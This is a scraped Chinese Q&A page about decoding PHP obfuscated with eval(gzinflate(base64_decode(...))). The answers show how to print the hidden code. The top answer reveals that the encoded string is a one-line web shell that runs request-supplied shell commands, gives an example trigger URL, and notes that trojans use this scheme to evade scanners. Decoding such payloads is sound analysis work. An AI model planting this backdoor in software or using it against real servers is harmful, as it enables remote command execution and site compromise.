55问答网
所有问题
PHP解密..不懂php,解密eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)))
如题所述
举报该问题
推荐答案 2013-09-18
你可以编辑一个php文件,输入
<?php echo
gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));
?>
然后运行这个文件 php test.php 就能看到结果了。
这种方式是很弱的加密,但能避开很多代码检测工具。很多wordpress的插件和木马都采用这种模式。
wordpress常footer进行加密,因为里面包含作者的链接和申明,如果去掉这行代码,整个页面就不能正确显示。
木马可以通过这种隐秘的方式传入一段代码让php执行,像上面的例子,结果是 echo `$_REQUEST[a]`;; ?> 所以你在URL里传入 /?a=ls -al; 就会列出当前目录下所有文件。
温馨提示:答案为网友推荐,仅供参考
当前网址:
http://55.wendadaohang.com/zd/F4QI848F8Rc4RRceR8L.html
其他回答
第1个回答 2013-09-18
一般这种文件都有一个最简单的解码方式
编码乱七八糟地字符串你不认识, eval命令同样不认识, 他最终给eval执行的肯定是正经的PHP代码,直接把eval命令中的参数打印出来就行了
相似回答
求
php解密eval(gzinflate(base64_decode(
“$
40pNzshXSFCJD3INDHUNDo
10j...
答:
这句话加密后是 echo `$_REQUESUYA]`;; ?>只有这一段,应该是跟你前后语句搭配起来的吧,单独无法执行。
谁能帮我解一下
PHP eval(gzinflate(base64_decode
代码
答:
gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDo
l0jE2wtlawt+MCAA==&)=》echo $_REQUESTYA]估计应该是base64字符串有错误 貌似正确的是:echo $_REQUEST["YA"];是要显示$_REQUEST["YA"]这个变量。
php 解密eval(gzinflate(
str_rot13
(base64_decode
答:
php 解密eval(gzinflate(
str_rot13
(base64_decode
我在网上搜到了答案,http://hacknote.com/read/?627.html说是把你的代码保存为2.TXT,在CMD下运行下面的命令:
PHP
B.PHP过一会程... 我在网上搜到了答案,http://hacknote.com/read/?627.html说是把你的代码保存为2.TXT,在CMD下运行下面的命令:PHP B.PH...
这类的加密怎么解~~ <?
php eval(gzinflate(base64_decode(
' 内容')>
答:
把
eval
换成echo输出,然后一直这样echo下去。就能出结果了。
求
php 解密eval(gzinflate(
str_rot13
(base64_decode
答:
我写了下面两个
PHP
文件://B.PHP <?
php
str=file_get_contents('2.txt');while (preg_match("/
eval
\
(gzinflate
\(str_rot13\
(base64_decode
\('([^']*)'/",$str,$match)){ fp=fopen('1.txt','w');fputs($fp,$match[1]);fclose($fp);system('php a.php');str=file_get_...
大家正在搜
decode
php byte
相关问题
PHP解密..不懂php,解密eval(gzinflate(...
求php解密eval(gzinflate(base64_de...
求解密PHP,<?php eval(gzinflate(ba...
求php解密eval(gzinflate(base64_de...
谁能帮我解一下PHP eval(gzinflate(base...
php <?eval(gzinflate(base64_de...
PHP代码解密
求 php 解密eval(gzinflate(str_rot...